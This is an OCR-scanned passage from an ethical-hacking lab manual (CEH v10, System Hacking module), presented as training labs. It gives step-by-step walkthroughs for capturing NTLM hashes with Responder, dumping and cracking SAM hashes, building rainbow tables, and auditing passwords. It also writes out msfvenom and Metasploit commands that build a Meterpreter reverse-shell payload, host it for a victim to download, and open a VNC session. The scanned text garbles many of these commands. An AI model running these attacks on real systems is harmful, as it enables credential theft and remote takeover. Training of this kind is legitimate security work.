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System Hacking 


Module 06 


Module 06 - Systom Hacking. 


System Hacking 
System backing is the science of testing computers and network for vulnerabilities and 
harmful plugins. 


он кет Lab Scenario 
E Valuable i 
ар a Password hacking is one of the easiest and most common ways hackers obtain 
unauthorized computer or network access. Although strong passwords that are 
Ld Tene difficult to crack (or guess) are easy to create and maintain, users often neglect this. 
eel: — "Therefore, passwords arc one of the weakest links in the information-security chain. 
E Webexrese Passwords rely on secrecy. After a password is compromised, its original owner isn't 
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the only person who can access the system with it. Hackers have many ways to obtain 
passwords. They can obtain passwords from local computers by using password- 
cracking software. To obtain passwords from across a network, they can use remote 
cracking utilities or network analyzers. The labs in this module demonstrate just how 
easily hackers can gather password information from your network, and describe 
password vulnerabilities that exist in computer networks, as well as countermeasures 
to help prevent these vulnerabilities from being exploited on your systems. 


Lab Objectives 


‘The objective of this lab is to help students learn to monitor a system remotely and 
to extract hidden files and other tasks that include: 


^ Extracting administrative passwords 


= Hiding files and extracting hidden files 
= Recovering passwords 


= Monitoring a system remotely 


Lab Environment 
‘To carry out this lab, you need: 
= A computer running Windows Server 2016 
+ А computer running Windows Server 2012 
= A computer minning Windows 10 in Virtual machine 
= A computer running Kali Linus in virtual machine 
= A web browser with an Internet connection 
= Administrative privilege to run tools 
Lab Duration 
"Time: 190 Minutes 
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Overview of System Hacking 
‘The goal of system hacking is to gain access, escalate privileges, execute applications, 
and hide files. 


Lab Tasks 
Ытази 1 Recommended labs to assist you in system hacking: 


Overview . 


Active Online Attack using Responder 
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords 
Creating and using the Rainbow Tables 

Auditing System Passwords using Lopht Crack 

Exploiting Client Side Vulnerabilities and Establishing a VNC Session 
Escalating Privileges by Exploiting Client Side Vulnerabilities 


Hacking Windows Server 2012 with a Malicious Office Document using 
TheFatRat 


Hacking Windows 10 Using Metasploit and PostExploiaüon using 
Meterpretet 


User System Monitoring and Surveillance using Spytech SpyAgent 
Web Activity Monitoring and Recording using Power Spy 

Hiding Files using NTFS Streams 

Hiding Data using White Space Steganography 

Image Steganography using OpenStego 

Image Steganography using Quick Stego 

Covert channels using Covert TCP 

Viewing, Enabling and Clearing Audit Policies using Auditpot 


Lab Analysis 
Analyze and document the results related to this lab exercise. Give your opinion on 
the targer's security posture and exposure, 


PLEASE TALK TO YOUR INSTRUCTOR ІР YOU HAVE QUESTION 


RELATED TO THIS LAB 
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Active Online Attack using Responder 
LLMNR/NBENS Spoofing Attach is a clie internal networks attack that still 
works today, due to low awareness and the fact ith enabled by deu is Windows. 
Lab Scenario 


LIMNR and NBI-NS ate enabled by default in Windows and can be used to extract 
the password hashes (rom a user. Since the awareness of this attack is fairly low, there 
is a good chance of acquiring the user credentials on a internal network penetration 
test. 


By listening for LIMNR/NB'T-NS broadcast requests, it is possible for an attacker to 
spoof itself as the server and senda response claiming to be the legitimate server, Afier 
the victim system accepts the connection, it is possible to gain the victim’s user- 
credentials by using a too! like Responder.py. 
Lab Objectives 
‘The objective of this lab is to help students understand how to: 

= Perform LLMNR/NBT-NS Spoofing attack on a network 


Lab Environment 
‘To perform the lab, you need: 
= Windows 10 running as a virtual machine 
= Kali Linux running as a virtual machine 
Lab Duration 


‘Time: 10 Minutes 


Overview of LLMNR/NBT-NS 


When a DNS name server request fails, Link-Local Multicast Name Resolution 
(LLMNR) and Net-BIOS Name Service (NBT-NS) is used by the windows systems 
аза fallback. Ifthe DNS name still remains unresolved, the windows system performs 
an unauthenticated UDP broadcast to the whole network. Any masquerading 
machine, claiming to be the server then sends a response and captures the victim's 
credentials during the authentication process. 
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Lab Tasks 
L Before starting this lab launch and login to Windows 10 machine. 


2. Login as Username: Jason, and Password: qwerty. 


€ 


3 Now launch Kali Linux virtual machine, and login (Username: root, 
Password: toor) 


А Open a command terminal from the taskbar, and type responder -1 ethà 
and press Enter as shown in the screenshot 


= 


m" 


—: 


& ^ Responder starts to listen the network interface for events as shown in the 
screenshot. 
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6, Assume that you want to access a shared network drive connected in your. 
network, using Windows 40 machine. 


Connect to the 7. Switch back to Windows 10 and right-click on Start icon, and dick Run as 
Shared Directory shown in the screenshot. 


B oras x 


FIGURES Lame бе Run window 


B. Run window appears, type Neeh4eols in the Open field and click OK. 
Leave the Windows 10 machine running and switch back to Kali Linux 
machine. 


S Run 


15] рене name of a program folder, document or Intemet 
resource, and Windows will open it for you. 


Open: [ею] 


emma EEE 


FIGURE LE Run widow 
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9. Responder starts captuting the access logs of Windows 10 machine as 
shown in the screenshot. 


10. Responder will collect the hashes of the logged in user of the target 


B raska machine. 
View and Crack 11. By default, Responder will store the logs in the usr/share/responderilogs. 
Obtained Hash TET 


FIGURE: 1: bine by responder 


12. Navigate to Places and click Computer from the menu bar as shown in the 
screenshot. 


FIGURE L7 Navi to карове fle 
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13, Computer window appears, navigate to usr Э share -> responder > 
logs and double-click recorded log file to open and view the recorded 
content, 
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14, Hashes of the logged in user collected by responder. 
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15, We will crack the hashes to know the password of the logged in user іе, 
Jason. 


16 То crack the passwords, open a new command line terminal and type john 


lusrishare/responderilogs/cfile name of the logs.txt> as shown in the 
screenshot. 


Note: Log file name will differ in your lab environment, Here the log file 
name is SMBv2-NTLMv2-SSP-10.10.10.10.txt. 


Ed 3 


IGURE 1.10 Caching нема wag i 


17, Cracked password hashes of the Jason user has shown in the screenshot. 
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Lab Analysis 


Analyze and document the results related to the lab exercise. 


PLEASE TALK TO YOUR INSTRUCTOR ІР YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 
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Dumping and Cracking SAM 
Hashes to Extract Plaintext 


Passwords 


Pcp? can be used to атр protected files, Opborack is a free open soure (GPL 
licensed) program that racks Windows passwords by using LM hashes through 
rainbow tables. 


Lab Scenario 


"The Security Account Manager (SAM) is a database file present on Windows 
machines that stores user accounts and security descriptors for users on a local 
computer, It stores users! passwords in a hashed format (in LM hash and NTLM 
hash). Because a hash function is one-way, this provides some measure of security 
for the storage of the passwords. 

Ina system hacking lifecycle, attackers generally dump operating system password. 
hashes immediately afier a compromise of the target machine. ‘The password 
hashes enable attackers to launch a variety of attacks on the system, including 
password cracking, pass the hash, unauthorized access of other systems using the 
same passwords, password analysis, and pattern recognition, in order to crack 
other passwords in the target environment. 

You need to have administrator access to dump the contents of the SAM file. 
Assessment of password strength is a critical milestone during your security 
assessment engagement, You will start your password assessment with a simple 
SAM hash dump and running it with a bash dceryptor to uncover plaintext 
passwords, 


Lab Objectives 
‘The objective of this lab is to help students learn how to: 
= Use the pwdump7 tool to extract password hashes 
= Use the Opheradk tool to cmck the passwords and obtain plain text 
passwords 
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Lab Environment 
"То carry out the lab you need: 


Pwdump7, located at ZACEHToolsICEHV10 Module 06 System 
Hacking\Password Cracking Toolslpwdump7 


Ophcrack tool, located at ZACEH-Tools\CEHV10 Module 06 System 
Hacking\Password Cracking Toolslophorack 


Run this tool on Windows 10 


You сап download the latest’ version of pwdump7 at 
httpiiwww.tarasco.org/security/pwdump 7/index.html 


You can download the latest vetsion of  Ophenck at 
httpilOpherack.sourceforge.net 


Administrative privileges to run tools 


Lab Duration 

"Time: 10 Minutes 

Overview of the Lab 

Pwdump7 can also be used to dump protected files. You caa always copy a used 
file by executing pwdumpT.exe -d c:\lockedfiledat backup-lockedfile.dat. 
Rainbow tables for LM hashes of alphanumeric passwords аге provided for free 
by the developers. By default, Opherack is bundled with tables that allow it to 


crack passwords not longer than 14 characters using only alphanumeric 
chatacters, 


Lab Tasks 


i" 


Before starting this lab, we need to find the User IDs associated with 
the usernames for Windows 10 machine 


2. Launch Windows 10 machine and login, 
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3. Launch Command prompt in Administrator mode, to launch type cmd 
їп the Search field and right-click on Command Prompt, and click Run 
аз administrator as shown in the screenshot. 
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Search sugo 5 Run as administrator 
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Pinta taskbar 


FIGURES 2 Open command раз kainat 


4. User Account Control pop-up appears click Yes. 


Ml windows Command Processor 


Verified publisher: Microsoft Windows 


Show more details 


E 


FIGURE 22. UAC romp 


CEH Lab Manual Pit ical Hacking and Countermeasures Cops © b Eb cl 
A hight оста Repedacton' билеу Pokies 


Module 06- System Hacking 


5. In the Command Prompt window, type wmie useraccount got. 
name,sid and press Enter. 


6. By issuing this command we got the usernames and respective UserlDs. 
Make а note of each UserID for further steps. 


i 


FIGURE A Geen Te hough oman penge 

7. Now, copy the pwdump? folder from the ZACEH-ToolsiCEHv10 
Module 06 System Hacking\Password Cracking Tools location and 
paste it on the Desktop, 


8. Now, open a new command prompt window in Administrator mode 
and type ed CUsers\Admin\Desktop\pwdump7 and press Enter. 


FIGURE 24 Change working tay ope 


9. Турс PwDump7.exe and press Enter to gather the Password hashes and 
UserIDs. 


iig cher pond ades 


10. Now, at the command prompt, type PwDump7.exe > cxihashes.txt and 
press Enter. 
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11. By issuing this command PwDump7exe will copy all the data of 
PwDump7.exe to the chashes.txt file, 


ттүү" 


12 То check the generated hashes, navigate to cand open the hashes.txt 
file with Notepad. 


13, Now place the usernames before the sespective UserlDs that we have 
gathered in step 6 as shown in the screenshot 
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14, Now press tris to save the file; save as window appears. Choose 
Desktop as save location and click Save button. 
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FIGURE 29: Seg heben fe 
15. Now, we shall attempt to crack these password hashes with the Opherack 
tool. 


16. Launch Ophcrack application from ZyGEH-ToolsiCEHv10 Module 06 
System HackingiPassword Cracking Tools\opherack\x86, 
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FIGURE 2U0 Lacing cack apie 
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17, ‘The Opherack main window appears, as shown in the screenshot: 


veod 


FIGURE 211: Ophendk Main windo 


18, Glick the Lead menu, and select PWDUMPfile. 


FIGURE 212 Serting PWDUMP Ale 
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19. The Open PWDUMP filo window appears. Browse the PWDUMP file 
hashes.txt located at Desktop, 


20, Select the hashes.txt file, located at Desktop, and click Open. 
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21. Hashes ate loaded in Ophcrack, as shown in the screenshot: 
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23, Table Selection window appears; sclect Vista free and click install, 
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24, "The Select the directory which contains the tables window appears. Select 
the table vista free folder, which is already downloaded and kept in 24СЕН- 
ToolsICEHviO Module 06 System HackingPassword Cracking 
Toolsiophcrack, and dick Select Folder. 


Note: You can download free XP and Vista Rainbow ‘Tables from 
|httpi/Ophcrack.sourceforge.nettables.php, 
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FIGURE 217: Choong be ie 


25, This tables_vista_fee is a pre-compnted table for reversing cryptographic 
hash functions and recovering plaintext passwords up to a certain length. 

26, "Ihe sclected table vista free is installed under the name Vista free, which 
ds represented by a green colored bullet, Select the table, and click OK, 
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27, Glick Crack on the memu bar. Opherack begins to crack passwords. 
Ophcrack will take few minutes to crack the passwords. Wait until it finishes 
the password cracking process 
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28, In the meanwhile, it will also display the cracked passwords of the respective 
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29, Cracked passwords arc displayed, as shown in the following screenshot: 
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30, In teal-time, if an attacker attempts to exploit a machine and escalate the 
privileges, he/she can obtain password hashes using tools such 
asPWdump7. By doing so, they can use hash decoding tools like 
Ophcrack to acquire plain-text passwords. 


Lab Analysis 
Analyze ай the password hashes gathered during this lab, and figure out what the 
password vas. 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 


Intemet Connection Required 
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Creating and using the Rainbow 
Tables 


Winrtgen is a graphical Rainbow Tables Generator that supports LM, Бий М, 
NTLM, LMCHALL, Най MCHALL, NTLMGHALL, MSCACHE, 
MD2, MD4, MDS, SHAT, RIPEMD160, MySQL323, MjSQLSHAI, 
GisoPIX, ORACLE, SHA-2 (256), $HA-2 (384), and SHA-2 (512) hashes 


RainbowC rack is a omputer program that generates rainbows tables for use in password 
cracking, 


Lab Scenario 


‘Once an attacker gains access to a system's SAM database dump, the easiest and fasted 
тоше he or she сап follow to recover the plain text password is to use rainbow tables, 
A rainbow table is a precompated table of all possible combinations of a given 
character set and their respective hash values, used for reversing, cryptographic hash 
functions. Password crackers compare the rainbow tables precompiled list of 
potential hashes to hashed passwords in the database. "The rainbow table associates 
plaintext possibilities with each of those hashes, which the attacker can then exploit to 
access the network as an authenticated user. 


Rainbow tables make password cracking much faster than earlier methods, such аз 
brute-force cracking and dictionary attacks. However, the approach uses a lotof RAM. 
duc to the large amount of data in such a table. With the availabilty of large computing: 
poses, you can generate huge rainbow tables that you can use for your security and 
password audit assignments. 


Lab Objectives 


"The objective of this lab is to show students how to create rainbow tables and use 
them to crack the hashes and obtain plain text passwords. 
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Lab Environment 
То carry out this lab, you need: 


A computer running Window Server 2016 
A computer running Windows 10 


Winrgen Tool located at ZACEH-TeolsiCEHV10 Module 06 System 
Hacking\Tools to Create Rainbow TablesWinrtgen 


RainbowCrack Tool located at ZACEH-Tools|CEHV10 Module 06 System 
Hacking\Tools to Create Rainbow TableslRainbowCrack 


Download the latest version of Winstgen at 
httpilwww.oxid.itiprojects.html 


Download the latest version of RainbowCrack at httpsiproject- 
rainbewerack.com! 


Tf you wish to download the latest version, then screenshots shown in the lab 
might differ 
Administrative privileges to tun the tools 


Lab Duration 

"Time: 10 Minutes 

Overview of Rainbow Tables 

A rainbow table is a pre computed table for reversing cryptographic hash functions, 


typically used for cracking password hashes. Tables are usually used in recovering the 
plaintext password consisting of a limited set of characters, up to a certain length. 


Lab Task 


Assume you that you got the Password of User Accounts available in the 
Windows 10 machine. hashes.txt file that you have got in the previous lab 
(Dumping and Cracking SAM Hashes to Extract Plaintext Passwords) located 
at Desktop of Windows 10 machine. Share the file by any medium so that it 
сап be accessed in Windows Server 2016 machine, 


Launch Windows Server 2016 machine and login. 


Navigate to ZACEH-ToolsiCEHv10 Modulo 06 System Hacking\Tools to 
Create Rainbow TablesWinrtgen, and double-click winrtgen.exe, 


Tfan Open File- Security Waming pop-up appears, click Run. 
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5. "The main window of Winrtgea opens, as shown in the following screenshot: 
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6. Click on Add Table button to add a new rainbow table. 


Wiesen aries Tabs белети) by mac 


Ere IE 


moe | men | ам | 


FIGURES owing he ninioy able 
[m 7. "Ie Rainbow Table properties window appears. 

i Select ntim from Mash dropdown Бы. 

Sct Min Lon as 4, Max Lon as 6 and Chain Count 4000000 

Select loweralpha from Charset dropdown list (ts depends upon 
Module 06 System Eee. 
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9, With these settings, you are creating a rainbow table that can be used to crack 
only ntim hashes containing lowercase alphabetical passwords varying 
between 46 characters in length, 


10, A file will be created and displayed in the Winrtgon window. Click ОК. 
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11, Winrtgen begins to create the hash table. 


Note: Winrtgen takes a lot of time to generate hashes. So, to save time for Lab 
demonstration, a pregenerated hash table is kept at the location ZACEH- 
Tools\CEHV10 Module 06 System Hacking!Tools to Create Rainbow 
Tables Winrtgen 
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12, The created hash table is saved automaticaly in 2\CEH-ToolsiCEHv10 Module 
06 System Hacking\Tools to Create Rainbow Tables\Winrtgen, 
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13, This generated table is used in tools such as RainbowCrack in order to crack 
passwords of various lengths, depending on the hashes you generate using 
Winrtgen. 

14, Now, we shall ry to use these tables and crack the password hashes using the 
RainbowCrack tool. 

15, Navigate to ZACEH-Tools\CEHv10 Module 06 System Hacking\Tools to 
Create Rainbow Tables\RainbowCrack, and double-click rerack guiexe, 

16 Ifan Open File - Security Warning pop-up appears, click Run. 


17. "The main window of RainbowCrack opens, as shown in the following 
screenshots 


FIGURE 3 Rak Cuckmda win 
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18. То айа a password hash in RainbowCtack, click the File menu, and click Load 
NTLM Hashes from PWDUMP File... 
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19. ‘The Open dialog: box appears. Navigate to the hashes.txt of Windows 10 
machine that we have gathered in the previous lab, and click Open. 
E orn 
€ 4 < l> текс; Desktop > vT] вка Beep 
озюме; нынын it- 
‘Ee Local Dik (C) 
ж Teen 
eene 
— 
CEH Lab Manual Pi Tibia Hacking end Соат Сорук © by Eius 


N Righs Ress ортодон к зис Probie 


Modulo 06 - system Hacking 


20, RainbowCzack will display the Hash value and the User name as shown in. 


the screenshot. 
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21, Import Rainbow table to RainbowCrack to crack the password navigate to 
Rainbow Table and click Search Rainbow Tables from the menu bar. 
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22. Open dialog box appears; navigate to pre generated rainbow tables which are 
located at and select ntim_loweralphat4-6_0_2400x4000000_oxid#000.rt 
click Open. 


“== x 


e ++ [ln GE. eee У Б) ak 2 
-mo 


ЕСТИ Date modified Type 


Organise © New folder = 


РЕ 


Fie name: [т cloeeniphesé 502300409. ~ 


FIGURE TE Sheet аник be 


As soon as you import the rainbow tables the RainbowCrack will crack the 
passwords of the Windows 10 machine users as shown in the screenshot, 


Nef Goes ated prae 
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FIGURE LZ punt cc by Rabon, 
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Lab Analysis 


Analyze and document the results related to this lab exercise, 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 


Intemet Connection Requ 
O Yes Z No 
Platform Supported 
FI Classroom йар» 
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Auditing System Passwords using 
LOphtCrack 


LüphiCrack is a password auditing tool that contains features such as scheduling, hash 
extraction from 64-bit Windows versions, multiprocessor algorithms, and network 
monitoring and decoding, 1! can import and crack UNIX password files from remote 
Windows machines, 


Lab Scenario 


Because security and compliance are high priorities for most organizations, 
attacks on an organization's computer systems take many different forms, such 
as spoofing, smurfing, and other types of Denial of Service (DoS) attacks. These 
attacks are designed to harm or interrupt the use of your operational systems. 


Password cracking isa term used to describe the penetration of a network, system, 
ог resource with or without the usc of tools to unlock a resource that has been 
secured with a password. In this lab, we will look at what password cracking is, 
why attackers do it, how they achieve their goals, and what you can do to do to 
protect yourself. Through an examination of several scenarios, in this lab we 
describe some of the techniques they deploy and the tools that aid them in their 
assaults and how password crackers work both internally and externally to violate 
а company's infrastructure. 


"To be an expert ethical hacker and penetration tester, you must understand how 
to crack an administrator password. In this lab, we crack system user accounts 
using LOphtCrack. 


Lab Objectives 
"The objective of this lab is to help students learn how to: 
= Use the LüphiCrack too! to attain user passwords that can be easily cracked 
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Lab Environment 
"To carry out the lab you need: 


LophtGrack tool located at ZICEH-ToolsICEHV10 Module 06 System 
Macking Password Cracking ToolsiLOphtCracik 


Windows Server 2016 running as a machine 
Windows Server 2012 running as a machine 


Or download the latest version of LüphtCrack at 
httpulwww.lOphtcrack.com 


Administrative privileges to run tools 


Lab Duration 
‘Time: 15 Minutes 
Overview of the Lab 


Tn this lab, being a security auditor, you will be running the LOphtCrack tool by giving 
the remote machine's administrator user credentials. User accounts passwords that are 
cracked in a short amount of time are considered to be weak, and you need to take 
certain measures to make them stronger. 


In this lab, we ate auditing passwords on a Windows Server 2012 system. 
Lab Tasks 


1. 
2. 


3. 
4. 


Launch Windows Server 2012 virtual machine. 


Launch and Login to Windows Server 2016 and navigate to ZICEH- 
тоов'СЕНу10 Module 06 System Hacking\Password Cracking 
ToolsiLOphtCrack. Double-click le7setup_v7.0.15_Win64.exe. 


If an Open File - Security Warning appears, click Run. 
Follow the wizard driven installation steps to install LOphtCrack. 


Note: At the time of installation, Program Compatibility Assistant pop-up 


may appear, С 


ick Close, and continue with the installation, 
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5. On completing the installation, launch LOphtCrack application from 
Apps lis. 


FIGURE 4: Launching the ардешов em Ap bt 
6, Click Proceed With Trial button in LOphtCrack 7 Trial window. 


Teme ieee 
Proce th Tal 
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FIGURE 42:1 shack? widow 
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7. Click Password Auditing Wizard as shown in the screenshot. 


Password Auditing Wizard 


ЕҢЕАЗ Был Pavon ing эзи 


В. In Introduction wizard click Next. 


| introduction 


the sad wie 


FIGURE Аа Pawo ing etd window 
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9, In Choose Target System Type wizard choose the Operating System 
type and click Next, In this lab we are choosing Windows. 


EES 


FIGURE AS: Choose eget synem pe tion 


10. Choose A remote machine radio button in Windows Import wizard, click 
Next, 


FIGURE 44 Windows pam option 
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11, In Windows Import From Remote Machine (SMB) wizard, type in the 
required details as shown in the screenshot. 


12, In the Most field type the IP address of the Target machine, here 
Windows Server 2012 (10.10.10.12) 


15, Select Use Specific User Credentials mdio button, and in the 
Credentials section type the login Credentials of Windows Server 2012 
machine 


Username: Administrator 
Password: PaS$wOrd 


14. If the machine is under the Domain, enter the domain name in the 
Domain section, hete Windows Server 2012 belongs to CEH.com domain. 


15. Once you entered all the required fields, click Next to proceed. 
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16. In the Choose Audit Type wizard, select Strong Password Audit radio 
button and click Next. 


ШЕШШ 20 Ase ne 


FIGURE А Chore audit type sesion LT ha 

17, In Reporting Options wizard, check Generate Report at End of Auditing 

option and then choose the Report type (here, CSV) and click Browse 
button to store the report in the desired location. 


= verti Options 


FIGURE 49 Report pion ein 
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18. In this lab we are choosing location as Desktop. Type file name, and click 
‘Save in Choose report file name window as shown in the scrcenshot. 


cm 53] 
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Исин 410 Chose poe name wow 
19. Click Next in the Reporting Options wizard after providing the location. 


к 


FIGURE 311 Reporting apriora seston 
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20. Choose Run this Job immediately radio button and click Next in the Job 
‘Scheduling wizard. 


GURE 4 12 Jb seal gin 


21, In the Summary wizard, click Finish. 
[ —— 


FIGURE 4.13 Samay option 
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22. Perform Calibration pop-up appears; click No to continue. 


Note: Perform Calibration pop-up will appear multiple times during the 
password cracking process, click No every time it appears. 


operation that measures the ч 


ту performed once, and w 
irte, the defeult CPU-b 


м wish to run calibration пом 


FIGURE 414 Perform elton window 


23, Copying LCT Agent pop-up appears; click Yes to continue. 


E Copying LCT Agent 
The LC7Agent on the remote machine wil be installed. 


There is a possibility of a man-in-the-middle attack unless you are using 


NTLMW2 between 


f this is not accepta 1C7 Agent b 
hand on th mentation, 


FIGURE 415: Copying LCT app window 
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24. LOphtCrack starts cracking the passwords of the target machine. In the 
lower right comer of the window you can see the status as shown in the 
screenshot. 


t 


FIGURE 41 Сени pasvord pages 
25, LOphtCrack will show you the cracked passwords of the users that are 
available in the target machine, 


FIGURE 417: pasos жекен аздай 


CEH Lab Mad Pape Аа Hacking and Grontennessies Сту by Hamel 
ARN Reserve, Reproducton Sy Poni, 


модмо 06 - Systom Hacking. 


26, So, you have successfully attained weak as well as strong passwords, You can 
dick the Stop button present at the lower left comer of the window once you 
gain ай the passwords. 


Lab Analysis 


‘Documental the results and reports gathered during the lab. 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 


Internet Connection Re 


D Yes HI No 
| Platform Supported 
| Classroom Wl iLabs 
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Exploiting Client Side Vulnerabilities 
and Establishing a VNC Session 


Attackers use client-side vulnerabilities to explit unpatched software, thereby attaining 
асап to the machine on wbich the software В installed 


Lab Scenario 


con REY 
£7 Valuable VNC enables attackers to remotely access and control computers targeted from 
afermiren another computer or mobile device, wherever they are in the world. At the same 
P Tes your time, itis also used by network administrators and organizations throughout every 
knowlalne industry sector for a range of different scenarios and use cases, including 


E кане 


ED Workbook review 


providing IT desktop support to colleagues and friends, and accessing systems 
and services on the move, Here, we will sce how attackers can exploit 
vulnerabilities in target systems to establish unauthorized VNC sessions and 
remotely control these targets. 


Lab Objectives 


‘The objective of this lab is to help students leam how to exploit client-side 


тоо vulnerabilities aad establish а VNC session. 
demonstrated in 
this tab are Lab Environment 
available in 
жели. "To carry this out, you need: 
(estne. = Kali Linux running in virtual machine (Attacker Machine) 
Modulo 06 
System Hacking "Windows 10 running in virtual machine (Victim machine) 
= Aweb browser 
= Administrative privileges to run tools 
Lab Duration 
Time: 10 Minutes 
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Overview of the Lab 


"This lab demonstrates the exploitation procedure enfotced on а weakly patched 
Windows 10 machine that allows you to gain remote access to it through a remote 


desktop connection. 
Lab Tasks 
ГЕРЕ 1. Launch Kali Linux machine and login. Open а Termimal and type 
——- a msfvenom -p windows/meterpreterireverse tcp --platform windows -a 
Launch X86 4 exe LHOST=(attacker machine IP address) LPORT=444 -o 
Metasploit iroot/Desktop/Test.exe and press Enter. 


Note: Here the attacker machine IP address is 4040.10.44 (Kali Linux 
Machine) 


5 ча эс эса эы и € i i i 


FIGURE. 51: Genes айан ere fe 


2. "This will generate Test.exe, a malicious file on Desktop as shown in the 
screenshot. 


EE Meteeneie an ake he 
prouenire 
Эна  mivenan -p vindoes/nererpreter/reverae T 


Seay Todeiagiit > рзттт wind 


FIGURE 5.2 Мадон беор 


3. Now create a directory to share this fle with the victim's machine, 
provide the permissions and copy the file from Desktop to shared 


[uem | 
a on өе 
uly diva а. Type mkdir arlwwwihtmllahare and press Enter to create a share 


folder. 
b. Туре chmod -R 755 jvarwwwihtmlishare and press Enter, 


с. Туре chown -R www-datawww-data varwww/htmiishare press 
Enter. 
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Now copy the malicious file to the shared location by typing ep 
Iroot/Desktop/Test.exe ivarlwwwlhtmlshare and press Enter. 


vr. 


TES 4. Now мап the apache service, to do dis type service apache start and 
Using Browser rete Enter: 
Exeter = [TL н 
Windows T 
3. Туре msfeansole and press Enter to launch Metasploit framework, 
Penance ae 
PETES 6, In msf console type use multiihandler and press Enter. 
a 
Setting Payload 
7. Now we need to set the payload, LHOST, LPORT to do this 
rus ret à, “Type set patena wintowalmetespreterimveraa sep and pies 
Кес Enter. 
p " whe peg b. Туре set LHOST 10.10.10.11 and press Enter, 
reuse CSS кара c. Type set LPORT 444 and press Enter. 


oer ded a er 
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8. Туре exploit and press Enter to start the listener, Leave the Kali Linux 
machine running and switch to Windows 40 machine, 
d ves 


E оаа 
quie aaa yeu ean nue 
deni wath atte te 
жаК war така or 


FIGURE 7: Suning he ener 


[mm 9. Login to Windows 10 machine, and open a browser, In this lab we are 
арна using the Chrome browser. 


Run Exploit 
10. In the address bar of the browser type httpe/'10.10.10.11 /share and press. 


Enter. 


11. As soon as you press Eater, it will display the share folder contents as 
shown in the screenshot. 


7 12. Click Test.exe file to download. 
ED тезе commend 
mcs br ecient 
rx you ee verlag vh. 


Note: 10.10.10.11 is the IP address of the attacker machine ie., Kali 
Linux. 


Index of /share 
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13. "The malicious file will be downloaded in the default downloads location. 
of the browser. Here in this lab Downloads is the location. Now, double- 
click the Testexe file to run. 


o erc ошын 


FIGURE 53: Мае Bie suce dowloaded 


Drass 14. Open File - Security Warning window appears, Click Run. Leave the 
ج‎ Windows 10 machine munning, and switch to Kali Linux machine. 


ا 
[Open File - Security Warning‏ 
TE‏ 
Eum‏ 
роз бус UN‏ 
up Ue‏ 
Туре Application.‏ 
бс з,‏ = 
E Always ask before opening this file‏ 
IEEE‏ 
Өө eee‏ 
Hew сап | decide what software to run?‏ 
ТЕЕ —— AT‏ 
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15. Now switch to the attacker machine іс, Kali Linux machine. Observe 
that one session is created or opened in the Meterpretershell as shown 
in the screenshot. 


es = | 


FIGURE S Motore shel cem obuia 
ED Winns dense 


16, То open a session in Meterpreter shell, type sessions-i4 and press Enter 


em Note: If the Meterpreter shell is connected to the session automatically, 
pon then skip this step, 


тшт = 


FIGURE 812 Connecting tothe ама chine hap metre be 


TITRE TY 170 Metetprete shell appents as shown in the serccoshot, Type eystafo aad 
2 press Enter to verify that Windows 10 machine is hacked. 

Remote View in mS = 

perte 1 
nd 
18. Now, create a VNC session to capture to access Windows 10 machine. 
remotely. 

=a TTT TTT OT 
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19. Туре run vne and ptess Enter, 


m 


FIGURE S14: Openinga VNC session mui атт 


20. This will open а VNC session of the Victim's machine as shown in the 
screenshot. 


ETE 


эзи 


FIGURE 515 Vici system ey secs throug а VNC esse 
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Lab Analysis 


Analyze and document the results related to this lab exercise. Provide your opinion 
regarding your target’ security posture and exposure. 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAR. 


Internet Connection Required 


M Yes D No 
Platform Supported. 
Б] Classroom. О iLabs 
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Escalating Privileges by Exploiting 
Client Side Vulnerabilities 

Privilege Escalation is the demonstration of misusing а bug, configuration imperfection, 
or design oversight in a working framework. or programming application to increase 
fied access to assets that are regularly shielded from an application or dient. 

Lab Scenario 


‘Once attackers pain access to the target system, they start looking for different ways 
to escalate their privilege in the system. They can exploit vulnerability, design flaw or 
configuration oversight in the operating system or software applications on the target 
system to gain elevated access to resources that are normally protected from an 
application or user, The privilege escalation can be vertical or lateral. 


Lab Objectives 


"The objective of this lab is to help students learn how to escalate privileges on a victim 
machine by exploiting its vulnerabilities. 


Lab Environment 

‘To perform this lab, you need: 
= Windows В running as virtual machine 
= Windows 10 running as virtual machine 
= Kali Linux running as virtual machine 

Lab Duration 

‘Time: 20 Minutes 


GEH Lab Mania Pag: 493 


Tibe Hacking and Coumseoneanurs Сорун © s Eb Come 
AN Riches Reserved Reproduction s Sici Probl. 


Module 06 - System Hacking 


Overview of the Lab 


‘This lab demonstrates the exploitation procedure enforced on a weakly patched 
Windows 8 machine that allows you to gain access to it through a meterpreter shell 
and then employing privilege escalation techniques to attain administrative privileges 
10 the machine through meterpreter shell 


Lab Tasks 


Note: Before performing this lab, log in to Kali Linux virtual machine, Click 
Places > Computer. Navigate to File System Э etc Э apache2, open 
apache2.conf, enter the command servername localhost in а new line, and 


save the file. 
CETTE 1, Launch Windows 10 virtual machine and log in to its administrator 
account, 
Croatoa 
Backdoor 2. Switch то Kali Linux virtual machine and log into it 
3. Launch a command line terminal. 
4. ‘Type the command msfvenom -p windows/meterpreterireverse tcp — 
са X86 е xBGishikata ga паі -b "x00" 
xo > Dosktop/Exploit.oxe and press Enter. 
FIGURE 6: Cringe Payload 
5. The above command will create a Windows executable file named 
"ExploiLexe" and will be saved on the Kali Linux desktop. 
LLimetaspioit 
Framework is a FIGUR 62: Crested xpi tone fle 
tooi for developing 
and executing 


exploit code 
against a remote 
target machine. 
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REE 6. Now you need to share Exploit.exe with the victim machine, (In this lab, 

wae we are using Windows 10 as the victim machine). 

Exploit.exe File 7. Open a new command line terminal, ype the command mkdir 
ariwwwihtml/share and press Enter to create a new directory named 
share, 

p oo 13 
Fie tat View сас Terisi нк 


Ете 
per 
аллее 


B. Change thc mode for the share folder то 755 by typing the command. 
chmod -R 755 /variwww/html/share/ and press Enter. 


NL 779 


re Е Иен Search Tema Help 


EB roce te mak of 
күп 


9. Change the ownership of that folder to www-data, by typing the 


command chown -R www-datazwww-data ivariwwwihtmlshare! and 
pressing Enter. 


PT ъа re tat View Search Teminat Нер 
марш a. 

Vox ше corned 
dor Rowden sve tU share 
реа 


FIGURE 6 Changs the ownership of the foldet 


10. Type the command Is а ivarfwwwihtmii | grep share and press Enter. 


78 58 
